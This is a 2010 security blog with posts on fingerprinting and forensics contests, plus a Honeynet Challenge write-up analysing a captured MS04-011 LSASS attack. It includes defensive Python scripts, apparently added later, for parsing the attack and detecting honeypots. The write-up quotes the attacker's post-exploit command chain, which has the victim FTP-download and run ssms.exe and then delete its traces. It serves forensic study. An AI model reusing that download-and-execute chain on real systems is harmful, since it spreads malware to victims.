Thursday, February 25, 2010

Pass the Hash

While I normally post info on here about fingerprinting, I also like looking at anything that "gives away too much info". I've known about the pass the hash technique for quite a while now, but never paid it much attention until I watched a demo on how effective it can be.

Anyway, nice paper on how it works, some of the tools to do it and some mitigation options from what I've read so far. Need to do more than scan it, but give it a check.

Wednesday, February 17, 2010

SSL/TLS Fingerprinting

I've been following Thierry Zoller off and on for years now, probably helped that he was one of the first people to find and mention Satori back in the day.

He's come up with a new tool that fingerprints SSL/TLS connections called SSL/TLS Audit. Actually, it is a tool that does SSL/TLS Auditing, just happens to have a feature that in turn fingerprints the ssl engine.

"Apart from scanning available ciphersuites it has an interesting tidbit : The Fingerprint mode (Experimental). Included is an experimental fingerprint engine that tries to determine the SSL Engine used server side. It does so by sending normal and malformed SSL packets that can be interpreted in different ways.

SSL Audit is able to fingerprint :
· IIS7.5 (Schannel)
· IIS7.0 (Schannel)
· IIS 6.0 (Schannel)
· Apache (Openssl)
· Apache (NSS)
· Certicom
· RSA BSAFE "

They have an upcoming paper due out it looks like, so it will be interesting to see what information they provide. Gives me some ideas, so depending on time in the near future I may have to look into this a bit more.

Sunday, February 14, 2010

Honeynet Challenge #1 Results

Well I didn't do as well as I'd hoped on Challenge #1, only got a 25 out of 40 on score, ranking me 28 out of the 91 submissions. Top third, but not as high as I would have liked.

Here were my score results:
Answer 1: 2 points (of 2)
Answer 2: 1.5 points (of 2)
Answer 3: 2 points (of 2)
Answer 4: 1.5 points (of 2)
Answer 5: 4 points (of 6)
Answer 6: 3 points (of 6)
Answer 7: 2 points (of 2)
Answer 8: 1 point (of 8)
Answer 9: 4 points (of 6)
Answer 10: 2 points (of 2)
Answer 11: 2 points (of 2)

Looks like I blew the shell code section along with the general overview! A bit off here/there other than that too, but those were the worst sections.

Here were the questions again:
1. Which systems (i.e. IP addresses) are involved? (2pts)
2. What can you find out about the attacking host (e.g., where is it located)? (2pts)
3. How many TCP sessions are contained in the dump file? (2pts)
4. How long did it take to perform the attack? (2pts)
5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
6. Can you sketch an overview of the general actions performed by the attacker? (6pts)
7. What specific vulnerability was attacked? (2pts)
8. What actions does the shellcode perform? Pls list the shellcode. (8pts)
9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)
10. Was there malware involved? What's the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)
11. Do you think this is a manual or an automated attack? Why? (2pts)

Anyway, very fun exercise, glad they put it on and they are posting the results earlier than I thought they would, didn't expect anything until tomorrow.

Looks like they are planning another one in the near future. Not sure it is something I'll work on, but keep your eyes on their site if you are interested!

Thursday, February 4, 2010

Forensic Contest #4 released

More information at their site, but here is what they are asking you to find.

1. What was the IP address of Mr. X’s scanner?
2. What type of port scan(s) did Mr. X conduct? Check all that apply:

* TCP SYN
* TCP ACK
* UDP
* TCP Connect
* TCP XMAS
* TCP RST

3. What were the IP addresses of the targets Mr. X discovered?
4. What was the MAC address of the Apple system he found?
5. What was the IP address of the Windows system he found?
6. What TCP ports were open on the Windows system? (Please list the decimal numbers from lowest to highest.)
X-TRA CREDIT (You don’t have to answer this, but you get super bonus points if you do): What was the name of the tool Mr. X used to port scan? How can you tell? Can you reconstruct the output from the tool, roughly the way Mr. X would have seen it?

Deadline is 3/04/10 (11:59:59PM UTC-11) (In other words, if it’s still 3/04/10 anywhere in the world, you can submit your entry.)

Tuesday, February 2, 2010

Forensics Contest #3 - Answers

Ok, not going to do a writeup on this one. NetworkMiner was able to pull all the info out without much work. Thankfully it puts TCP packets back together and reconstructs the .xml files in question. Hopefully someone out there was able to come up with a new script to pull all the info they wanted, but it wasn't me, that is for sure!

My answers were:
1. 002500FE07C4
2. AppleTV/2.4
3. h, ha, hac, hack
4. Hackers
5. http://a227.v.phobos.apple.com/us/r1000/008/Video/62/bd/1b/mzm.plqacyqb..640x278.h264lc.d2.p.m4v
6. Sneakers
7. $9.99
8. iknowyourewatchingme

Honeynet Challenge #1 - Answers

The deadline was yesterday, so I think I'm ok posting my answers. Not sure if these are correct or not, but this is what I submitted. If anyone has any questions let me know. Again, this was a fun exercise:

Question 1. Which systems (i.e. IP addresses) are involved?

Tools Used: Satori, NetworkMiner, and Wireshark
192.150.11.111 – End system
98.114.205.102 - Attacker

-----

Question 2. What can you find out about the attacking host (e.g., where is it located)?

Tools Used: WHOIS, Wireshark

TTL 113; since it appears to be a Windows box, 15 hops away.

According to: http://www.ipaddresslocation.org/ip-address-locator.php

They are most likely located in/around Southampton Pennsylvania, which is where the local Verizon Internet Services office is located at least.

Attack System appears to be a Windows 2000 system (TTL puts it as Windows (typically), TCP fingerprint puts it as a Windows 2000, XP or 2003 box, and SMB puts it as Windows 2000; SMB is normally the most reliable of those mentioned).

-----

Question 3. How many TCP sessions are contained in the dump file?

Tools Used: NetworkMiner, verified with Wireshark

5 total:
- 4 from 98.114.205.102
- 1 from 192.150.11.111

-----

Question 4. How long did it take to perform the attack?

Tools Used: Wireshark

It depends on what part you consider the actual attack:

Max of 16.2 seconds from the first packet to the last packet in the capture. Most of the time is actually FTP’ing a file.

Within the first 2 seconds the Buffer Overflow has already taken place. The next 14 seconds are sending the command to the system and FTP’ing the file.

-----

Question 5. Which operating system was targeted by the attack? And which service? Which vulnerability?

Tools Used: Satori, Wireshark

192.150.11.111

2 competing fingerprints:

* Based on TTL and TCP fingerprinting it appears to be a Linux box, most likely 2.6 kernel.
* SMB packets on the other hand claim it is on the VIDCAM Domain and running Windows 5.1 (packets 16 & 19)

Based on the attack that appears to be happening against DsRoleUpgradeDownlevelServer I’d say it is an XP system; Trying to exploit MS04-011, targeting the Windows LSA Service.

-----

Question 6. Can you sketch an overview of the general actions performed by the attacker?

Tools Used: Wireshark

Authenticates as a null user to ipc$, performs a DsRoleUpgradeDownlevelServer Buffer Overflow. Once exploited, forces the system to FTP a file.

First they dump these commands in the file ‘o’:

open 0.0.0.0 8884

user 1 1

get ssms.exe

Then they do:

ftp -n -s:o (Suppresses auto-login and reads data in from the ‘o’ file)

Delete the ‘o’ file to make sure nobody can see what they did, forcing quiet mode and deletion of read-only files, just in case.

Then launch ssms.exe

-----

Question 7. What specific vulnerability was attacked?

MS04-011, good writeup at:

http://research.eeye.com/html/advisories/published/AD20040413C.html

-----

Question 8. What actions does the shellcode perform? Pls list the shellcode

Tools Used: Wireshark, trace TCP conversation

It targets DSRoleUpgradeDownLevelServer, does a buffer overflow of a lot of 0x31, or 1’s in ASCII. As soon as that is done it starts a new TCP conversation and does this (more info back in question #6):

echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe

ssms.exe

It appears to call ssms.exe twice, not sure if that is by design or due to a bug???
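Pulling the useful facts out of a captured command chain like the one above is the kind of thing worth scripting rather than eyeballing. The following is an added example, not part of the original post: it splits the cmd.exe chain on `&`, replays the redirected `echo` commands to rebuild the dropped ‘o’ script, and reports the FTP server, port, fetched file, cleanup and execution steps. The input is the command string quoted above; nothing else is assumed.

```python
"""Decompose the one-line command chain quoted in Question 8 (added example, not part of the post)."""
import re

# The command string captured in the challenge, quoted from the post.
CAPTURED = ("echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o "
            "&echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe")

REDIRECT = re.compile(r"^echo\s+(.*?)\s*(>>|>)\s*(\S+)$")  # 'echo TEXT > FILE' / '>> FILE'


def split_chain(cmdline):
    # Split a cmd.exe '&' chain into its individual commands (no quoting appears in this sample).
    return [c.strip() for c in cmdline.split("&") if c.strip()]


def reconstruct_files(commands):
    """Replay the redirected echo commands to rebuild each dropped file, line by line."""
    files = {}
    for cmd in commands:
        m = REDIRECT.match(cmd)
        if not m:
            continue
        text, op, name = m.groups()
        if op == ">":            # '>' truncates, '>>' appends
            files[name] = []
        files.setdefault(name, []).append(text)
    return files


def analyze(cmdline):
    """Return the facts an analyst records: FTP server/port, fetched files, cleanup, execution."""
    commands = split_chain(cmdline)
    files = reconstruct_files(commands)
    report = {"commands": commands, "files": files, "ftp_server": None,
              "ftp_port": None, "downloads": [], "deleted": [], "executed": []}
    for cmd in commands:
        parts = cmd.split()
        verb = parts[0].lower()
        if verb == "ftp":
            # -s:FILE makes ftp.exe read its commands from the dropped script.
            script = next((p[3:] for p in parts if p.lower().startswith("-s:")), None)
            for line in files.get(script, []):
                words = line.split()
                if words[0] == "open":
                    report["ftp_server"] = words[1]
                    report["ftp_port"] = int(words[2]) if len(words) > 2 else 21
                elif words[0] == "get":
                    report["downloads"].append(words[1])
        elif verb == "del":
            report["deleted"] += [p for p in parts[1:] if not p.startswith("/")]
        elif verb != "echo":
            report["executed"].append(parts[0])
    return report
```

Splitting the quoted one-liner this way yields seven commands and a single `ssms.exe` execution; the second `ssms.exe` in the trace sits outside this string.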

-----

Question 9. Do you think a Honeypot was used to pose as a vulnerable victim? Why?

Tools Used: Satori (http://myweb.cableone.net/xnih)

Yes. Go back to #5. TCP fingerprint shows the box as Linux 2.6, SMB shows the box as Windows XP. The TTL can be tweaked on windows, but the rest of the TCP fingerprint is hard to modify, though there are some tweaks that can be done that may allow this.
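The reasoning in Questions 2, 5 and 9 (read the hop count off the TTL, guess the OS family from the TCP/IP stack, then check whether the OS the host claims over SMB agrees) can be written down as a small consistency check. This is an added example, not from the original post or from Satori; the initial-TTL and keyword tables are a common heuristic, not Satori's fingerprint database.

```python
"""Cross-check the fingerprint evidence used in Questions 2, 5 and 9 (added example, not from the post)."""

# Default initial TTLs and the OS families that commonly ship them (heuristic, not Satori's database).
INITIAL_TTLS = {64: "unix", 128: "windows", 255: "other"}
FAMILY_KEYWORDS = {"windows": "windows", "linux": "unix", "bsd": "unix", "solaris": "unix"}


def infer_initial_ttl(observed):
    """Pick the smallest default initial TTL >= observed; hops = initial - observed.

    TTL 113 -> initial 128, 15 hops, as worked out in Question 2.
    """
    for initial in sorted(INITIAL_TTLS):
        if observed <= initial:
            return initial, initial - observed
    raise ValueError(f"TTL {observed} exceeds any known default")


def family_of(os_name):
    """Reduce a fingerprint string such as 'Windows 5.1' or 'Linux 2.6' to a coarse family."""
    lowered = os_name.lower()
    for keyword, family in FAMILY_KEYWORDS.items():
        if keyword in lowered:
            return family
    return "other"


def assess_host(observed_ttl, tcp_os, smb_os=None):
    """Combine TTL, TCP stack fingerprint and the OS the host itself claims over SMB.

    Layer-3/4 evidence is set by the kernel; the SMB banner is set by the application
    and is easy to emulate, so disagreement suggests a honeypot or other emulation.
    """
    initial, hops = infer_initial_ttl(observed_ttl)
    ttl_family = INITIAL_TTLS[initial]
    tcp_family = family_of(tcp_os)
    verdict = {"initial_ttl": initial, "hops": hops, "ttl_family": ttl_family,
               "tcp_family": tcp_family, "conflicts": []}
    if ttl_family != tcp_family and "other" not in (ttl_family, tcp_family):
        verdict["conflicts"].append("TTL and TCP fingerprint disagree")
    if smb_os is not None:
        smb_family = family_of(smb_os)
        verdict["smb_family"] = smb_family
        if smb_family != tcp_family:
            verdict["conflicts"].append("SMB-claimed OS disagrees with TCP/IP stack")
    verdict["likely_emulated"] = bool(verdict["conflicts"])
    return verdict
```

Fed the attacker's values (TTL 113, Windows fingerprints all round) it reports 15 hops and no conflict; fed a Linux-looking stack that announces Windows 5.1 over SMB it flags the mismatch described above.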

-----

Question 10. Was there malware involved? What's the name of the malware? (We are not looking for a detailed malware analysis for this challenge)

Smss.exe, may be W32/Spybot-MP worm and IRC backdoor, but without analysis it is hard to say. That is just a guess based on the name and the name alone.

-----

Question 11. Do you think this is a manual or an automated attack? Why?

Automated, it only took 16 seconds from start to finish. Typing this sentence up took that long with a few typos! Not to mention, most of that 16.2 seconds was downloading the ssms.exe file. So while it is possible someone sat there and did it, due to the quickness in which it took place it seems unlikely.